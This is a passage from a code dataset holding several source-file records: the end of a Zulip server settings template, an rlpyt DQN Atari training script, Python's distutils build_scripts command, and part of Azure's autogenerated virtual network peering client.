Permissions\n#\n# (2) Enter the application ID for the app as SOCIAL_AUTH_AZUREAD_OAUTH2_KEY here\n# (3) Put the application password in zulip-secrets.conf as 'azure_oauth2_secret'.\n#SOCIAL_AUTH_AZUREAD_OAUTH2_KEY = ''\n\n########\n# SSO via REMOTE_USER.\n#\n# If you are using the ZulipRemoteUserBackend authentication backend,\n# set this to your domain (e.g. if REMOTE_USER is \"username\" and the\n# corresponding email address is \"username@example.com\", set\n# SSO_APPEND_DOMAIN = \"example.com\")\nSSO_APPEND_DOMAIN = None # type: Optional[str]\n\n################\n# Miscellaneous settings.\n\n# Support for mobile push notifications. Setting controls whether\n# push notifications will be forwarded through a Zulip push\n# notification bouncer server to the mobile apps. See\n# https://zulip.readthedocs.io/en/latest/production/mobile-push-notifications.html\n# for information on how to sign up for and configure this.\n#PUSH_NOTIFICATION_BOUNCER_URL = 'https://push.zulipchat.com'\n\n# Whether to redact the content of push notifications. This is less\n# usable, but avoids sending message content over the wire. In the\n# future, we're likely to replace this with an end-to-end push\n# notification encryption feature.\n#PUSH_NOTIFICATION_REDACT_CONTENT = False\n\n# Whether to submit basic usage statistics to help the Zulip core team. Details at\n#\n# https://zulip.readthedocs.io/en/latest/production/mobile-push-notifications.html\n#\n# Defaults to True if and only if the Mobile Push Notifications Service is enabled.\n#SUBMIT_USAGE_STATISTICS = True\n\n# Controls whether session cookies expire when the browser closes\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\n\n# Session cookie expiry in seconds after the last page load\nSESSION_COOKIE_AGE = 60 * 60 * 24 * 7 * 2 # 2 weeks\n\n# Password strength requirements; learn about configuration at\n# https://zulip.readthedocs.io/en/latest/production/security-model.html.\n# PASSWORD_MIN_LENGTH = 6\n# PASSWORD_MIN_GUESSES = 10000\n\n# Controls whether Zulip sends \"new login\" email notifications.\n#SEND_LOGIN_EMAILS = True\n\n# Controls whether or not there is a feedback button in the UI.\nENABLE_FEEDBACK = False\n\n# Feedback sent by your users will be sent to this email address.\nFEEDBACK_EMAIL = ZULIP_ADMINISTRATOR\n\n# Controls whether or not error reports (tracebacks) are emailed to the\n# server administrators.\n#ERROR_REPORTING = True\n# For frontend (JavaScript) tracebacks\n#BROWSER_ERROR_REPORTING = False\n\n# If True, each log message in the server logs will identify the\n# Python module where it came from. Useful for tracking down a\n# mysterious log message, but a little verbose.\n#LOGGING_SHOW_MODULE = False\n\n# If True, each log message in the server logs will identify the\n# process ID. Useful for correlating logs with information from\n# system-level monitoring tools.\n#LOGGING_SHOW_PID = False\n\n# Controls whether or not Zulip will provide inline image preview when\n# a link to an image is referenced in a message. Note: this feature\n# can also be disabled in a realm's organization settings.\n#INLINE_IMAGE_PREVIEW = True\n\n# Controls whether or not Zulip will provide inline previews of\n# websites that are referenced in links in messages. Note: this feature\n# can also be disabled in a realm's organization settings.\n#INLINE_URL_EMBED_PREVIEW = True\n\n# Controls whether or not Zulip will parse links starting with\n# \"file:///\" as a hyperlink (useful if you have e.g. an NFS share).\nENABLE_FILE_LINKS = False\n\n# By default, files uploaded by users and profile pictures are stored\n# directly on the Zulip server. You can configure files being instead\n# stored in Amazon S3 or another scalable data store here. See docs at:\n#\n# https://zulip.readthedocs.io/en/latest/production/upload-backends.html\n#\n# If you change LOCAL_UPLOADS_DIR to a different path, you will also\n# need to manually edit Zulip's nginx configuration to use the new\n# path. For that reason, we recommend replacing /home/zulip/uploads\n# with a symlink instead of changing LOCAL_UPLOADS_DIR.\nLOCAL_UPLOADS_DIR = \"/home/zulip/uploads\"\n#S3_AUTH_UPLOADS_BUCKET = \"\"\n#S3_AVATAR_BUCKET = \"\"\n#S3_REGION = \"\"\n\n# Maximum allowed size of uploaded files, in megabytes. DO NOT SET\n# ABOVE 80MB. The file upload implementation doesn't support chunked\n# uploads, so browsers will crash if you try uploading larger files.\n# Set MAX_FILE_UPLOAD_SIZE to 0 to disable file uploads completely\n# (including hiding upload-related options from UI).\nMAX_FILE_UPLOAD_SIZE = 25\n\n# Controls whether name changes are completely disabled for this\n# installation. This is useful when you're syncing names from an\n# integrated LDAP/Active Directory.\nNAME_CHANGES_DISABLED = False\n\n# Controls whether avatar changes are completely disabled for this\n# installation. This is useful when you're syncing avatars from an\n# integrated LDAP/Active Directory.\nAVATAR_CHANGES_DISABLED = False\n\n# Controls whether users who have not uploaded an avatar will receive an avatar\n# from gravatar.com.\nENABLE_GRAVATAR = True\n\n# To override the default avatar image if ENABLE_GRAVATAR is False, place your\n# custom default avatar image at /home/zulip/local-static/default-avatar.png\n# and uncomment the following line.\n#DEFAULT_AVATAR_URI = '/local-static/default-avatar.png'\n\n# To access an external postgres database you should define the host name in\n# REMOTE_POSTGRES_HOST, you can define the password in the secrets file in the\n# property postgres_password, and the SSL connection mode in REMOTE_POSTGRES_SSLMODE\n# Valid values for REMOTE_POSTGRES_SSLMODE are documented in the\n# \"SSL Mode Descriptions\" table in\n# https://www.postgresql.org/docs/9.5/static/libpq-ssl.html\n#REMOTE_POSTGRES_HOST = 'dbserver.example.com'\n#REMOTE_POSTGRES_SSLMODE = 'require'\n\n# If you want to set a Terms of Service for your server, set the path\n# to your markdown file, and uncomment the following line.\n#TERMS_OF_SERVICE = '/etc/zulip/terms.md'\n\n# Similarly if you want to set a Privacy Policy.\n#PRIVACY_POLICY = '/etc/zulip/privacy.md'\n\n\n################\n# Twitter integration.\n\n# Zulip supports showing inline Tweet previews when a tweet is linked\n# to in a message. To support this, Zulip must have access to the\n# Twitter API via OAuth. To obtain the various access tokens needed\n# below, you must register a new application under your Twitter\n# account by doing the following:\n#\n# 1. Log in to http://dev.twitter.com.\n# 2. In the menu under your username, click My Applications. From this page, create a new application.\n# 3. Click on the application you created and click \"create my access token\".\n# 4. Fill in the values for twitter_consumer_key, twitter_consumer_secret, twitter_access_token_key,\n# and twitter_access_token_secret in /etc/zulip/zulip-secrets.conf.\n\n\n################\n# Email gateway integration.\n#\n# The Email gateway integration supports sending messages into Zulip\n# by sending an email.\n# For details, see the documentation:\n# https://zulip.readthedocs.io/en/latest/production/settings.html#email-gateway\nEMAIL_GATEWAY_PATTERN = \"\"\n\n# If you are using polling, edit the IMAP settings below:\n#\n# The IMAP login; username here and password as email_gateway_password in\n# zulip-secrets.conf.\nEMAIL_GATEWAY_LOGIN = \"\"\n# The IMAP server & port to connect to\nEMAIL_GATEWAY_IMAP_SERVER = \"\"\nEMAIL_GATEWAY_IMAP_PORT = 993\n# The IMAP folder name to check for emails. All emails sent to EMAIL_GATEWAY_PATTERN above\n# must be delivered to this folder\nEMAIL_GATEWAY_IMAP_FOLDER = \"INBOX\"\n\n\n################\n# LDAP integration.\n#\n# Zulip supports retrieving information about users via LDAP, and\n# optionally using LDAP as an authentication mechanism.\n\nimport ldap\nfrom django_auth_ldap.config import LDAPSearch\n\n########\n# LDAP integration, part 1: Connecting to the LDAP server.\n#\n# For detailed instructions, see the Zulip documentation:\n# https://zulip.readthedocs.io/en/latest/production/authentication-methods.html#ldap\n\n# The LDAP server to connect to. Setting this enables Zulip\n# automatically fetching each new user's name from LDAP.\n# Example: \"ldaps://ldap.example.com\"\nAUTH_LDAP_SERVER_URI = \"\"\n\n# The DN of the user to bind as (i.e., authenticate as) in order to\n# query LDAP. If unset, Zulip does an anonymous bind.\nAUTH_LDAP_BIND_DN = \"\"\n\n# Passwords and secrets are not stored in this file. The password\n# corresponding to AUTH_LDAP_BIND_DN goes in `/etc/zulip/zulip-secrets.conf`.\n# In that file, set `auth_ldap_bind_password`. For example:\n# auth_ldap_bind_password = abcd1234\n\n\n########\n# LDAP integration, part 2: Mapping user info from LDAP to Zulip.\n#\n# For detailed instructions, see the Zulip documentation:\n# https://zulip.readthedocs.io/en/latest/production/authentication-methods.html#ldap\n\n# The LDAP search query to find a given user.\n#\n# The arguments to `LDAPSearch` are (base DN, scope, filter). In the\n# filter, the string `%(user)s` is a Python placeholder. The Zulip\n# server will replace this with the user's Zulip username, i.e. the\n# name they type into the Zulip login form.\n#\n# For more details and alternatives, see the documentation linked above.\nAUTH_LDAP_USER_SEARCH = LDAPSearch(\"ou=users,dc=example,dc=com\",\n ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\")\n\n# Configuration to lookup a user's LDAP data given their email address\n# (For Zulip reverse mapping). If users log in as e.g. \"sam\" when\n# their email address is \"sam@example.com\", set LDAP_APPEND_DOMAIN to\n# \"example.com\". Otherwise, leave LDAP_APPEND_DOMAIN=None and set\n# AUTH_LDAP_REVERSE_EMAIL_SEARCH and AUTH_LDAP_USERNAME_ATTR below.\nLDAP_APPEND_DOMAIN = None # type: Optional[str]\n\n# LDAP attribute to find a user's email address.\n#\n# Leave as None if users log in with their email addresses,\n# or if using LDAP_APPEND_DOMAIN.\nLDAP_EMAIL_ATTR = None # type: Optional[str]\n\n# AUTH_LDAP_REVERSE_EMAIL_SEARCH works like AUTH_LDAP_USER_SEARCH and\n# should query an LDAP user given their email address. It and\n# AUTH_LDAP_USERNAME_ATTR are required when LDAP_APPEND_DOMAIN is None.\n#AUTH_LDAP_REVERSE_EMAIL_SEARCH = LDAPSearch(\"ou=users,dc=example,dc=com\",\n# ldap.SCOPE_SUBTREE, \"(email=%(email)s)\")\n\n# AUTH_LDAP_USERNAME_ATTR should be the Zulip username attribute\n# (defined in AUTH_LDAP_USER_SEARCH).\n#AUTH_LDAP_USERNAME_ATTR = \"uid\"\n\n# This map defines how to populate attributes of a Zulip user from LDAP.\n#\n# The format is `zulip_name: ldap_name`; each entry maps a Zulip\n# concept (on the left) to the LDAP attribute name (on the right) your\n# LDAP database uses for the same concept.\nAUTH_LDAP_USER_ATTR_MAP = {\n # full_name is required; common values include \"cn\" or \"displayName\".\n # If names are encoded in your LDAP directory as first and last\n # name, you can instead specify first_name and last_name, and\n # Zulip will combine those to construct a full_name automatically.\n \"full_name\": \"cn\",\n # \"first_name\": \"fn\",\n # \"last_name\": \"ln\",\n\n # Profile pictures can be pulled from the LDAP \"thumbnailPhoto\"/\"jpegPhoto\" field.\n # \"avatar\": \"thumbnailPhoto\",\n\n # This line is for having Zulip to automatically deactivate users\n # who are disabled in LDAP/Active Directory (and reactivate users who are not).\n # See docs for usage details and precise semantics.\n # \"userAccountControl\": \"userAccountControl\",\n}\n\n# Whether to automatically deactivate users not found in LDAP. If LDAP\n# is the only authentication method, then this setting defaults to\n# True. If other authentication methods are enabled, it defaults to\n# False.\n#LDAP_DEACTIVATE_NON_MATCHING_USERS = True\n\n################\n# Miscellaneous settings.\n\n# The default CAMO_URI of '/external_content/' is served by the camo\n# setup in the default Voyager nginx configuration. Setting CAMO_URI\n# to '' will disable the Camo integration.\nCAMO_URI = '/external_content/'\n\n# RabbitMQ configuration\n#\n# By default, Zulip connects to rabbitmq running locally on the machine,\n# but Zulip also supports connecting to RabbitMQ over the network;\n# to use a remote RabbitMQ instance, set RABBITMQ_HOST to the hostname here.\n# RABBITMQ_HOST = \"127.0.0.1\"\n# To use another rabbitmq user than the default 'zulip', set RABBITMQ_USERNAME here.\n# RABBITMQ_USERNAME = 'zulip'\n\n# Memcached configuration\n#\n# By default, Zulip connects to memcached running locally on the machine,\n# but Zulip also supports connecting to memcached over the network;\n# to use a remote Memcached instance, set MEMCACHED_LOCATION here.\n# Format HOST:PORT\n# MEMCACHED_LOCATION = 127.0.0.1:11211\n\n# Redis configuration\n#\n# By default, Zulip connects to redis running locally on the machine,\n# but Zulip also supports connecting to redis over the network;\n# to use a remote Redis instance, set REDIS_HOST here.\n# REDIS_HOST = '127.0.0.1'\n# For a different redis port set the REDIS_PORT here.\n# REDIS_PORT = 6379\n# If you set redis_password in zulip-secrets.conf, Zulip will use that password\n# to connect to the redis server.\n\n# Controls whether Zulip will rate-limit user requests.\n# RATE_LIMITING = True\n\n# By default, Zulip connects to the thumbor (the thumbnailing software\n# we use) service running locally on the machine. If you're running\n# thumbor on a different server, you can configure that by setting\n# THUMBOR_URL here. Setting THUMBOR_URL='' will let Zulip server know that\n# thumbor is not running or configured.\n#THUMBOR_URL = 'http://127.0.0.1:9995'\n#\n# This setting controls whether images shown in Zulip's inline image\n# previews should be thumbnailed by thumbor, which saves bandwidth but\n# can modify the image's appearance.\n#THUMBNAIL_IMAGES = True\n\n# Controls the Jitsi Meet video call integration. By default, the\n# integration uses the SaaS meet.jit.si server. You can specify\n# your own Jitsi Meet server, or if you'd like to disable the\n# integration, set JITSI_SERVER_URL = None.\n#JITSI_SERVER_URL = 'jitsi.example.com'\n"} {"ext": "py", "sha": "1a2fc8666597869658455165ed41e12d1dcdac07", "content": "\n\"\"\"\nRuns one instance of the Atari environment and optimizes using DQN algorithm.\nCan use a GPU for the agent (applies to both sample and train). No parallelism\nemployed, so everything happens in one python process; can be easier to debug.\n\nThe kwarg snapshot_mode=\"last\" to logger context will save the latest model at\nevery log point (see inside the logger for other options).\n\nIn viskit, whatever (nested) key-value pairs appear in config will become plottable\nkeys for showing several experiments. If you need to add more after an experiment, \nuse rlpyt.utils.logging.context.add_exp_param().\n\n\"\"\"\n\nfrom rlpyt.samplers.serial.sampler import SerialSampler\nfrom rlpyt.envs.atari.atari_env import AtariEnv, AtariTrajInfo\nfrom rlpyt.algos.dqn.dqn import DQN\nfrom rlpyt.agents.dqn.atari.atari_dqn_agent import AtariDqnAgent\nfrom rlpyt.runners.minibatch_rl import MinibatchRlEval\nfrom rlpyt.utils.logging.context import logger_context\nfrom polyaxon_client.tracking import get_outputs_path\n\n\n\ndef build_and_train(game=\"pong\", run_ID=0, cuda_idx=None):\n sampler = SerialSampler(\n EnvCls=AtariEnv,\n TrajInfoCls=AtariTrajInfo, # default traj info + GameScore\n env_kwargs=dict(game=game),\n eval_env_kwargs=dict(game=game),\n batch_T=4, # Four time-steps per sampler iteration.\n batch_B=1,\n max_decorrelation_steps=0,\n eval_n_envs=10,\n eval_max_steps=int(10e3),\n eval_max_trajectories=5,\n )\n algo = DQN(min_steps_learn=1e3) # Run with defaults.\n agent = AtariDqnAgent()\n runner = MinibatchRlEval(\n algo=algo,\n agent=agent,\n sampler=sampler,\n n_steps=50e6,\n log_interval_steps=1e3,\n affinity=dict(cuda_idx=cuda_idx),\n )\n config = dict(game=game)\n name = \"dqn_\" + game\n #log_dir = \"example_1\"\n log_dir = get_outputs_path()\n with logger_context(log_dir, run_ID, name, config, snapshot_mode=\"last\"):\n runner.train()\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--game', help='Atari game', default='pong')\n parser.add_argument('--run_ID', help='run identifier (logging)', type=int, default=0)\n parser.add_argument('--cuda_idx', help='gpu to use ', type=int, default=1)\n args = parser.parse_args()\n build_and_train(\n game=args.game,\n run_ID=args.run_ID,\n cuda_idx=args.cuda_idx,\n )\n"} {"ext": "py", "sha": "1a2fc8b876c35404d5fc43bc110195fcfed87476", "content": "\"\"\"distutils.command.build_scripts\n\nImplements the Distutils 'build_scripts' command.\"\"\"\n\n__revision__ = \"$Id: build_scripts.py 77704 2010-01-23 09:23:15Z tarek.ziade $\"\n\nimport os, re\nfrom stat import ST_MODE\nfrom distutils.core import Command\nfrom distutils.dep_util import newer\nfrom distutils.util import convert_path\nfrom distutils import log\n\n# check if Python is called on the first line with this expression\nfirst_line_re = re.compile('^#!.*python[0-9.]*([ \\t].*)?$')\n\nclass build_scripts (Command):\n\n description = \"\\\"build\\\" scripts (copy and fixup #! line)\"\n\n user_options = [\n ('build-dir=', 'd', \"directory to \\\"build\\\" (copy) to\"),\n ('force', 'f', \"forcibly build everything (ignore file timestamps\"),\n ('executable=', 'e', \"specify final destination interpreter path\"),\n ]\n\n boolean_options = ['force']\n\n\n def initialize_options (self):\n self.build_dir = None\n self.scripts = None\n self.force = None\n self.executable = None\n self.outfiles = None\n\n def finalize_options (self):\n self.set_undefined_options('build',\n ('build_scripts', 'build_dir'),\n ('force', 'force'),\n ('executable', 'executable'))\n self.scripts = self.distribution.scripts\n\n def get_source_files(self):\n return self.scripts\n\n def run (self):\n if not self.scripts:\n return\n self.copy_scripts()\n\n\n def copy_scripts (self):\n \"\"\"Copy each script listed in 'self.scripts'; if it's marked as a\n Python script in the Unix way (first line matches 'first_line_re',\n ie. starts with \"\\#!\" and contains \"python\"), then adjust the first\n line to refer to the current Python interpreter as we copy.\n \"\"\"\n _sysconfig = __import__('sysconfig')\n self.mkpath(self.build_dir)\n outfiles = []\n for script in self.scripts:\n adjust = 0\n script = convert_path(script)\n outfile = os.path.join(self.build_dir, os.path.basename(script))\n outfiles.append(outfile)\n\n if not self.force and not newer(script, outfile):\n log.debug(\"not copying %s (up-to-date)\", script)\n continue\n\n # Always open the file, but ignore failures in dry-run mode --\n # that way, we'll get accurate feedback if we can read the\n # script.\n try:\n f = open(script, \"r\")\n except IOError:\n if not self.dry_run:\n raise\n f = None\n else:\n first_line = f.readline()\n if not first_line:\n self.warn(\"%s is an empty file (skipping)\" % script)\n continue\n\n match = first_line_re.match(first_line)\n if match:\n adjust = 1\n post_interp = match.group(1) or ''\n\n if adjust:\n log.info(\"copying and adjusting %s -> %s\", script,\n self.build_dir)\n if not self.dry_run:\n outf = open(outfile, \"w\")\n if not _sysconfig.is_python_build():\n outf.write(\"#!%s%s\\n\" %\n (self.executable,\n post_interp))\n else:\n outf.write(\"#!%s%s\\n\" %\n (os.path.join(\n _sysconfig.get_config_var(\"BINDIR\"),\n \"python%s%s\" % (_sysconfig.get_config_var(\"VERSION\"),\n _sysconfig.get_config_var(\"EXE\"))),\n post_interp))\n outf.writelines(f.readlines())\n outf.close()\n if f:\n f.close()\n else:\n if f:\n f.close()\n self.copy_file(script, outfile)\n\n if os.name == 'posix':\n for file in outfiles:\n if self.dry_run:\n log.info(\"changing mode of %s\", file)\n else:\n oldmode = os.stat(file)[ST_MODE] & 07777\n newmode = (oldmode | 0555) & 07777\n if newmode != oldmode:\n log.info(\"changing mode of %s from %o to %o\",\n file, oldmode, newmode)\n os.chmod(file, newmode)\n\n # copy_scripts ()\n\n# class build_scripts\n"} {"ext": "py", "sha": "1a2fc8c2af2a2668dba79d4cb1d14088e7ae64ca", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\nfrom typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union\nimport warnings\n\nfrom azure.core.async_paging import AsyncItemPaged, AsyncList\nfrom azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error\nfrom azure.core.pipeline import PipelineResponse\nfrom azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest\nfrom azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod\nfrom azure.mgmt.core.exceptions import ARMErrorFormat\nfrom azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling\n\nfrom ... import models\n\nT = TypeVar('T')\nClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]\n\nclass VirtualNetworkPeeringsOperations:\n \"\"\"VirtualNetworkPeeringsOperations async operations.\n\n You should not instantiate this class directly. Instead, you should create a Client instance that\n instantiates it for you and attaches it as an attribute.\n\n :ivar models: Alias to model classes used in this operation group.\n :type models: ~azure.mgmt.network.v2020_03_01.models\n :param client: Client for service requests.\n :param config: Configuration of service client.\n :param serializer: An object model serializer.\n :param deserializer: An object model deserializer.\n \"\"\"\n\n models = models\n\n def __init__(self, client, config, serializer, deserializer) -> None:\n self._client = client\n self._serialize = serializer\n self._deserialize = deserializer\n self._config = config\n\n async def _delete_initial(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n virtual_network_peering_name: str,\n **kwargs\n ) -> None:\n cls = kwargs.pop('cls', None) # type: ClsType[None]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n # Construct URL\n url = self._delete_initial.metadata['url'] # type: ignore\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'virtualNetworkName': self._serialize.url(\"virtual_network_name\", virtual_network_name, 'str'),\n 'virtualNetworkPeeringName': self._serialize.url(\"virtual_network_peering_name\", virtual_network_peering_name, 'str'),\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.delete(url, query_parameters, header_parameters)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200, 202, 204]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n if cls:\n return cls(pipeline_response, None, {})\n\n _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'} # type: ignore\n\n async def begin_delete(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n virtual_network_peering_name: str,\n **kwargs\n ) -> AsyncLROPoller[None]:\n \"\"\"Deletes the specified virtual network peering.\n\n :param resource_group_name: The name of the resource group.\n :type resource_group_name: str\n :param virtual_network_name: The name of the virtual network.\n :type virtual_network_name: str\n :param virtual_network_peering_name: The name of the virtual network peering.\n :type virtual_network_peering_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :keyword str continuation_token: A continuation token to restart a poller from a saved state.\n :keyword polling: True for ARMPolling, False for no polling, or a\n polling object for personal polling strategy\n :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)\n :rtype: ~azure.core.polling.AsyncLROPoller[None]\n :raises ~azure.core.exceptions.HttpResponseError:\n \"\"\"\n polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]\n cls = kwargs.pop('cls', None) # type: ClsType[None]\n lro_delay = kwargs.pop(\n 'polling_interval',\n self._config.polling_interval\n )\n cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]\n if cont_token is None:\n raw_result = await self._delete_initial(\n resource_group_name=resource_group_name,\n virtual_network_name=virtual_network_name,\n virtual_network_peering_name=virtual_network_peering_name,\n cls=lambda x,y,z: x,\n **kwargs\n )\n\n kwargs.pop('error_map', None)\n kwargs.pop('content_type', None)\n\n def get_long_running_output(pipeline_response):\n if cls:\n return cls(pipeline_response, None, {})\n\n if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)\n elif polling is False: polling_method = AsyncNoPolling()\n else: polling_method = polling\n if cont_token:\n return AsyncLROPoller.from_continuation_token(\n polling_method=polling_method,\n continuation_token=cont_token,\n client=self._client,\n deserialization_callback=get_long_running_output\n )\n else:\n return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)\n begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'} # type: ignore\n\n async def get(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n virtual_network_peering_name: str,\n **kwargs\n ) -> \"models.VirtualNetworkPeering\":\n \"\"\"Gets the specified virtual network peering.\n\n :param resource_group_name: The name of the resource group.\n :type resource_group_name: str\n :param virtual_network_name: The name of the virtual network.\n :type virtual_network_name: str\n :param virtual_network_peering_name: The name of the virtual network peering.\n :type virtual_network_peering_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: VirtualNetworkPeering, or the result of cls(response)\n :rtype: ~azure.mgmt.network.v2020_03_01.models.VirtualNetworkPeering\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VirtualNetworkPeering\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n # Construct URL\n url = self.get.metadata['url'] # type: ignore\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'virtualNetworkName': self._serialize.url(\"virtual_network_name\", virtual_network_name, 'str'),\n 'virtualNetworkPeeringName': self._serialize.url(\"virtual_network_peering_name\", virtual_network_peering_name, 'str'),\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n deserialized = self._deserialize('VirtualNetworkPeering', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'} # type: ignore\n\n async def _create_or_update_initial(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n virtual_network_peering_name: str,\n virtual_network_peering_parameters: \"models.VirtualNetworkPeering\",\n **kwargs\n ) -> \"models.VirtualNetworkPeering\":\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VirtualNetworkPeering\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n content_type = kwargs.pop(\"content_type\", \"application/json\")\n accept = \"application/json\"\n\n # Construct URL\n url = self._create_or_update_initial.metadata['url'] # type: ignore\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'virtualNetworkName': self._serialize.url(\"virtual_network_name\", virtual_network_name, 'str'),\n 'virtualNetworkPeeringName': self._serialize.url(\"virtual_network_peering_name\", virtual_network_peering_name, 'str'),\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Content-Type'] = self._serialize.header(\"content_type\", content_type, 'str')\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n body_content_kwargs = {} # type: Dict[str, Any]\n body_content = self._serialize.body(virtual_network_peering_parameters, 'VirtualNetworkPeering')\n body_content_kwargs['content'] = body_content\n request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200, 201]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n if response.status_code == 200:\n deserialized = self._deserialize('VirtualNetworkPeering', pipeline_response)\n\n if response.status_code == 201:\n deserialized = self._deserialize('VirtualNetworkPeering', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'} # type: ignore\n\n async def begin_create_or_update(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n virtual_network_peering_name: str,\n virtual_network_peering_parameters: \"models.VirtualNetworkPeering\",\n **kwargs\n ) -> AsyncLROPoller[\"models.VirtualNetworkPeering\"]:\n \"\"\"Creates or updates a peering in the specified virtual network.\n\n :param resource_group_name: The name of the resource group.\n :type resource_group_name: str\n :param virtual_network_name: The name of the virtual network.\n :type virtual_network_name: str\n :param virtual_network_peering_name: The name of the peering.\n :type virtual_network_peering_name: str\n :param virtual_network_peering_parameters: Parameters supplied to the create or update virtual\n network peering operation.\n :type virtual_network_peering_parameters: ~azure.mgmt.network.v2020_03_01.models.VirtualNetworkPeering\n :keyword callable cls: A custom type or function that will be passed the direct response\n :keyword str continuation_token: A continuation token to restart a poller from a saved state.\n :keyword polling: True for ARMPolling, False for no polling, or a\n polling object for personal polling strategy\n :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n :return: An instance of AsyncLROPoller that returns either VirtualNetworkPeering or the result of cls(response)\n :rtype: 